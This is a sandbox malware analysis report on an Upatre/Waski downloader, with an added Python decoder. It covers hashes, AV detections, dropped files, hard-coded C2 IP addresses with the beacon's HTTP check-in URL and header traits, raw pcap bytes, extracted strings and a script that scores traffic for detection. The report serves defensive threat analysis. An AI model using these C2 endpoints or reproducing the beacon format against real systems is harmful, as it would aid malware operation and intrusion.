Analysis Date: 2015-10-14 05:11:41
MD5: 45ad31391702eb466c387ad10d970652
SHA1: c48e18048f669394dc5afffd4718ca8b523c9dd0

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 1c9cabde003cd2afaef2c7fb4b76b48c sha1: 61a77d0a99d52d4a9b21c3f7a18db60b10cc598b size: 28672
Section .rdata: md5: 182095e09af60adf80d285b158e8e3ec sha1: 3cfdab9f9394cd544a8940e1e90ce3b9942c6077 size: 4096
Section .data: md5: 71cb675a1f2ebedeba28377166388a9e sha1: c94bfb19df6f37b584b4fffc5af120ad39e92fcf size: 40960
Section .rsrc: md5: 6359f4503cf69f71b214c66184325a0d sha1: 721a314ff4a279cbc0c1028342f30c309329e132 size: 24576
Timestamp: 1982-06-30 16:40:32 (PE header timestamp; it predates the PE format itself, so it is forged and says nothing about the build time)
Version: FileVersion: 1, 7, 4, 9
ProductVersion: 1, 0, 4, 9
Packer: Microsoft Visual C++ v6.0 (a compiler signature on the entry-point stub, not a packer; the Kryptik/Crypt detections below suggest a crypter wrapped around the downloader)
PEhash: e80522232b54c328594b82b2e35df4909f142724
IMPhash: c198dc513ea205655d29d5d9e3512721
AV Rising: no_virus
AV Mcafee: Upatre-FABL!45AD31391702
AV Avira (antivir): TR/AD.Yarwi.Y.1479
AV Twister: TrojanDldr.Upatre.fio.khjv
AV Ad-Aware: Trojan.Downloader.JRQQ
AV Alwil (avast): Kryptik-PJI [Trj]
AV Eset (nod32): Win32/TrojanDownloader.Waski.F
AV Grisoft (avg): Crypt4.TBP
AV Symantec: Downloader.Upatre!g14
AV Fortinet: W32/Waski.HL!tr
AV BitDefender: Trojan.Downloader.JRQQ
AV K7: Trojan ( 004beadd1 )
AV Microsoft Security Essentials: TrojanDownloader:Win32/Upatre!rfn
AV MicroWorld (escan): Trojan.Downloader.JRQQ
AV MalwareBytes: Trojan.Upatre.VM4
AV Authentium: W32/Downloader.WBWB-6032
AV Frisk (f-prot): W32/Downldr2.IZRA
AV Ikarus: Trojan.Win32.Crypt
AV Emsisoft: Trojan.Downloader.JRQQ
AV Zillya!: Downloader.Upatre.Win32.22825
AV Kaspersky: Trojan-Downloader.Win32.Upatre.fio
AV Trend Micro: TROJ_UPATRE.SMJY
AV CAT (quickheal): TrojanDownloader.Upatre.RF4
AV VirusBlokAda (vba32): TrojanDownloader.Upatre
AV Padvish: no_virus
AV BullGuard: Trojan.Downloader.JRQQ
AV Arcabit (arcavir): Trojan.Downloader.JRQQ
AV ClamAV: Win.Trojan.Upatre-3924
AV Dr. Web: Trojan.Upatre.201
AV F-Secure: Trojan.Downloader.JRQQ
AV CA (E-Trust Ino): no_virus

Runtime Details:


Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\DIDASD9BC.log
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\UlnAKO3o.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\UlnAKO3o.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\UlnAKO3o.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\icanhazip[1].htm
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File: C:\malware.exe (the copy dropped in %TEMP% removes the original sample)
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
(The proxy registry reads, the index.dat files, the cached icanhazip[1].htm and the four mutexes are ordinary WinInet side effects of the HTTP requests in Network Details; \Device\Afd\Endpoint is a raw Winsock socket. None of these is a sample-specific indicator.)
Winsock DNS: 91.240.97.71
Winsock DNS: 109.196.204.142
Winsock DNS: 81.7.109.65
Winsock DNS: 91.240.97.38
Winsock DNS: 217.12.59.234
Winsock DNS: 80.87.220.102
Winsock DNS: 46.151.130.90
Winsock DNS: icanhazip.com
Winsock DNS: 91.240.97.36
(Resolver calls on IP literals: the peer list is hard-coded as addresses. icanhazip.com is the only real name lookup, which is why it is the only entry in the DNS section below.)

Network Details:

DNS: icanhazip.com Type: A 104.238.145.30
DNS: icanhazip.com Type: A 104.238.141.75
DNS: icanhazip.com Type: A 104.238.136.31
HTTP GET: http://icanhazip.com/  User-Agent: Mozilla/5.0 (Windows NT 6.1)
HTTP GET: http://81.7.109.65:13380/TUSR13/COMPUTER-XXXXXX/0/51-SP3/0/  User-Agent: Mozilla/5.0 (Windows NT 6.1)
(The first request learns the victim's public IP; the second is the check-in. Its path carries a campaign tag, the hostname and "51-SP3", consistent with the XP SP3 sandbox (NT 5.1), while the User-Agent claims Windows NT 6.1 and has no other browser tokens. The UA is therefore hard-coded and, together with a bare IP:port Host on a non-standard port and Cache-Control: no-cache on a GET, is a usable detection pivot.)
Flows TCP: 192.168.1.1:1031 ➝ 104.238.145.30:80
Flows TCP: 192.168.1.1:1032 ➝ 81.7.109.65:13380
Flows TCP: 192.168.1.1:1033 ➝ 217.12.59.234:443
Flows TCP: 192.168.1.1:1034 ➝ 217.12.59.234:443
Flows TCP: 192.168.1.1:1035 ➝ 217.12.59.234:443
Flows TCP: 192.168.1.1:1036 ➝ 217.12.59.234:443
Flows TCP: 192.168.1.1:1037 ➝ 80.87.220.102:443
Flows TCP: 192.168.1.1:1038 ➝ 80.87.220.102:443
Flows TCP: 192.168.1.1:1039 ➝ 80.87.220.102:443
Flows TCP: 192.168.1.1:1040 ➝ 80.87.220.102:443
Flows TCP: 192.168.1.1:1041 ➝ 46.151.130.90:443
Flows TCP: 192.168.1.1:1042 ➝ 46.151.130.90:443
Flows TCP: 192.168.1.1:1043 ➝ 46.151.130.90:443
Flows TCP: 192.168.1.1:1044 ➝ 46.151.130.90:443
Flows TCP: 192.168.1.1:1045 ➝ 91.240.97.71:443
Flows TCP: 192.168.1.1:1046 ➝ 91.240.97.71:443
Flows TCP: 192.168.1.1:1047 ➝ 91.240.97.71:443
Flows TCP: 192.168.1.1:1048 ➝ 91.240.97.71:443
Flows TCP: 192.168.1.1:1049 ➝ 91.240.97.36:443
Flows TCP: 192.168.1.1:1050 ➝ 91.240.97.36:443
Flows TCP: 192.168.1.1:1051 ➝ 91.240.97.36:443
Flows TCP: 192.168.1.1:1052 ➝ 91.240.97.36:443
Flows TCP: 192.168.1.1:1053 ➝ 91.240.97.38:443
Flows TCP: 192.168.1.1:1054 ➝ 91.240.97.38:443
Flows TCP: 192.168.1.1:1055 ➝ 91.240.97.38:443
Flows TCP: 192.168.1.1:1056 ➝ 91.240.97.38:443
Flows TCP: 192.168.1.1:1057 ➝ 109.196.204.142:443
Flows TCP: 192.168.1.1:1058 ➝ 109.196.204.142:443
(Four connections each to 217.12.59.234, 80.87.220.102, 46.151.130.90, 91.240.97.71, 91.240.97.36 and 91.240.97.38, and two to 109.196.204.142, all on 443, 26 in total. Only the first bytes of each were captured; see Raw Pcap.)

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   41636365 70743a20 74657874 2f2a2c20   Accept: text/*, 
0x00000020 (00032)   6170706c 69636174 696f6e2f 2a0d0a55   application/*..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f35 2e302028 57696e64 6f777320   la/5.0 (Windows 
0x00000050 (00080)   4e542036 2e31290d 0a486f73 743a2069   NT 6.1)..Host: i
0x00000060 (00096)   63616e68 617a6970 2e636f6d 0d0a4361   canhazip.com..Ca
0x00000070 (00112)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000080 (00128)   63616368 650d0a0d 0a                  cache....

0x00000000 (00000)   47455420 2f545553 5231332f 434f4d50   GET /TUSR13/COMP
0x00000010 (00016)   55544552 2d585858 5858582f 302f3531   UTER-XXXXXX/0/51
0x00000020 (00032)   2d535033 2f302f20 48545450 2f312e31   -SP3/0/ HTTP/1.1
0x00000030 (00048)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000040 (00064)   7a696c6c 612f352e 30202857 696e646f   zilla/5.0 (Windo
0x00000050 (00080)   7773204e 5420362e 31290d0a 486f7374   ws NT 6.1)..Host
0x00000060 (00096)   3a203831 2e372e31 30392e36 353a3133   : 81.7.109.65:13
0x00000070 (00112)   3338300d 0a436163 68652d43 6f6e7472   380..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000090 (00144)

(The 26 dumps that follow correspond to the 26 port-443 flows above; only the first three or four bytes of each connection were captured. 80 4c 01 03 and 80 2b 01 parse as SSLv2-compatible record headers: high bit set, 15-bit length 0x4c = 76 or 0x2b = 43, message type 0x01 = CLIENT-HELLO, followed by the version byte 0x03. They are the starts of TLS handshakes; no handshake content and no server response is visible in this capture.)

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.
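Added example, not part of the sandbox output: a decoder for the Raw Pcap rows above that rebuilds each payload, parses the check-in request, recognises the truncated SSLv2-style ClientHello headers, and scores the request on the traits a detection would key on. The two dumps embedded in the code are copied verbatim from this report; the regexes, the names given to the path fields ("51-SP3" read as NT 5.1 SP3) and the scoring rules are this editor's assumptions.

```python
"""Decode the report's Raw Pcap rows and score the beacon.

Added example, not part of the sandbox output. The two dumps are copied
verbatim from the Raw Pcap section; the regexes, the names given to the
check-in path fields and the scoring rules are this editor's assumptions.
"""
import re
from typing import Dict, List, Optional

DUMP_HTTP_CHECKIN = """\
0x00000000 (00000)   47455420 2f545553 5231332f 434f4d50   GET /TUSR13/COMP
0x00000010 (00016)   55544552 2d585858 5858582f 302f3531   UTER-XXXXXX/0/51
0x00000020 (00032)   2d535033 2f302f20 48545450 2f312e31   -SP3/0/ HTTP/1.1
0x00000030 (00048)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000040 (00064)   7a696c6c 612f352e 30202857 696e646f   zilla/5.0 (Windo
0x00000050 (00080)   7773204e 5420362e 31290d0a 486f7374   ws NT 6.1)..Host
0x00000060 (00096)   3a203831 2e372e31 30392e36 353a3133   : 81.7.109.65:13
0x00000070 (00112)   3338300d 0a436163 68652d43 6f6e7472   380..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
"""
DUMP_TLS = "0x00000000 (00000)   804c0103                              .L..\n"

# One dump row: hex offset, decimal offset, 1-4 hex groups, then the ASCII column
# (separated from the hex by two or more spaces). Rows with no hex are skipped.
DUMP_ROW = re.compile(r"^0x[0-9a-fA-F]{8} \(\d+\)\s+"
                      r"(?P<hex>(?:[0-9a-fA-F]{2,8} )*[0-9a-fA-F]{2,8})(?=\s{2,}|\s*$)")
# Field names are an assumption: "51-SP3" is read as NT 5.1 (XP) SP3, which
# matches the XP-style paths in the report; the two bare numbers are unknown.
CHECKIN_PATH = re.compile(r"^/(?P<campaign>[A-Za-z0-9]+)/(?P<hostname>[^/]+)/(?P<f3>\d+)/"
                          r"(?P<ver>\d{2,3})-(?P<sp>SP\d+)/(?P<f5>\d+)/$")
UA_SEEN = "Mozilla/5.0 (Windows NT 6.1)"          # the bare UA in both requests
IP_PORT_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}:(\d+)$")


def decode_dump(dump: str) -> bytes:
    """Rebuild payload bytes from hex-dump rows."""
    out = bytearray()
    for row in dump.splitlines():
        m = DUMP_ROW.match(row)
        if m:
            out += bytes.fromhex(m.group("hex").replace(" ", ""))
    return bytes(out)


def parse_sslv2_header(payload: bytes) -> Optional[Dict]:
    """SSLv2-compatible record: two header bytes with the high bit set carrying
    a 15-bit length, then the message type (0x01 = CLIENT-HELLO)."""
    if len(payload) < 3 or not payload[0] & 0x80:
        return None
    return {"record_len": ((payload[0] & 0x7F) << 8) | payload[1],
            "msg_type": payload[2], "client_hello": payload[2] == 0x01}


def parse_http_request(payload: bytes) -> Optional[Dict]:
    """Minimal HTTP/1.x request-line and header parser (ASCII only)."""
    try:
        head = payload.decode("ascii").partition("\r\n\r\n")[0]
    except UnicodeDecodeError:
        return None
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": parts[0], "path": parts[1], "headers": headers}


def parse_checkin_path(path: str) -> Optional[Dict]:
    m = CHECKIN_PATH.match(path)
    if not m:
        return None
    ver = m.group("ver")
    return {"campaign": m.group("campaign"), "hostname": m.group("hostname"),
            "os_version": f"{ver[0]}.{ver[1:]}", "service_pack": m.group("sp"),
            "unknown_fields": (int(m.group("f3")), int(m.group("f5")))}


def score_request(req: Dict, checkin: Optional[Dict]) -> List[str]:
    """Reasons a request looks like this downloader's beacon (empty = none)."""
    reasons, h = [], req["headers"]
    if checkin:
        reasons.append("Upatre-style check-in path")
        if h.get("user-agent") == UA_SEEN and not checkin["os_version"].startswith("6.1"):
            reasons.append(f"UA claims Windows NT 6.1 but path reports "
                           f"{checkin['os_version']}: hard-coded User-Agent")
    m = IP_PORT_HOST.match(h.get("host", ""))
    if m and m.group(1) not in ("80", "8080"):
        reasons.append(f"Host is a bare IP on non-standard port {m.group(1)}")
    return reasons


def classify(dump: str) -> Dict:
    """Decode one Raw Pcap block and say what it is."""
    payload = decode_dump(dump)
    req = parse_http_request(payload)
    if req:
        checkin = parse_checkin_path(req["path"])
        return {"kind": "http", "request": req, "checkin": checkin,
                "reasons": score_request(req, checkin)}
    rec = parse_sslv2_header(payload)
    return {"kind": "sslv2-record", **rec} if rec else {"kind": "unknown", "length": len(payload)}


if __name__ == "__main__":
    for name, dump in (("check-in", DUMP_HTTP_CHECKIN), ("443 flow", DUMP_TLS)):
        print(name, classify(dump))
```

The HTTP parser is tried first because the SSLv2 check only needs the high bit of the first byte set, which an ASCII request can never satisfy; the reverse order would misclassify nothing either, but this way an HTTP payload is fully parsed before any fallback. The scoring deliberately does not match on the IP or port, which change per campaign; the hard-coded User-Agent, the path shape and the bare IP:port Host are what survive infrastructure rotation.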


Strings
(Several strings look like damaged API or DLL names: jsrnel32.dll, Ke#nel, tFilpAttributesA, GAIsProcessorFeaturePresent. That is consistent with a crypter stub that repairs them at runtime, so the static import list here (GDI32, USER32, WINMM, WinSCard) and the IMPhash above describe the stub rather than the downloader it unpacks.)
i.G
tFilpAttributesA
eE
..
-E-0-0
\
...
00 ...........?-  
0
0 
0u&
041904b2
1, 0, 4, 9
1, 7, 4, 9
FileVersion
         (((((                  H
jsrnel32.dll
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
_"""####
!""""##
!""####
?,$=&'
"""####
#########################################################################################################
0B=x#A
1#QNAN
1#SNAN
3/$##t
5?&'X-
7HEvytGst
^}%95  A
_9=T)A
abnormal program termination
auxSetVolume
c"""####
@.data
DestroyWindow
DOMAIN error
DSUVWh
ExitProcess
- floating point not loaded
FreeEnvironmentStringsA
FreeEnvironmentStringsW
g"""####
GAIsProcessorFeaturePresent
GDI32.dll
GetACP
GetActiveWindow
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetModuleFileNameA
GetModuleHandleA
GetOEMCP
GetProcAddress
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemTime
GetTickCount
GetVersion
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
_hypot
Ke#nel
KERNEL32
KERNEL32.dll
k"""IJ
kspdfgh'd;f3454563356yghdfgh567sdfgsdfhdfiojlxdg
LCMapStringA
LCMapStringW
LoadLibraryA
LoadLibraryW
MessageBoxA
Microsoft Visual C++ Runtime Library
MultiByteToWideChar
- not enough space for arguments
- not enough space for environment
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
Program: 
<program name unknown>
"""&p/t
PulseEvent
- pure virtual function call
RaiseException
`.rdata
ResumeThread
RtlUnwind
runtime error 
Runtime Error!
SCardForgetCardTypeA
SelectObject
SetHandleCount
SING error
SS@SSPVSS
!""s"x
TerminateProcess
TerminateThread
!This program cannot be run in DOS mode.
t+Ht$Ht
TLOSS error
t#SSUP
+ttHHtd
t.;t$$t(
t$$VSS
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
user32.dll
USER32.dll
VC20XC00U
Vhrt73lA
VirtualAlloc
VirtualFree
WideCharToMultiByte
WINMM.dll
WinSCard.dll
WriteFile
"WWSh\
####"x
_^][YY
"""zV$#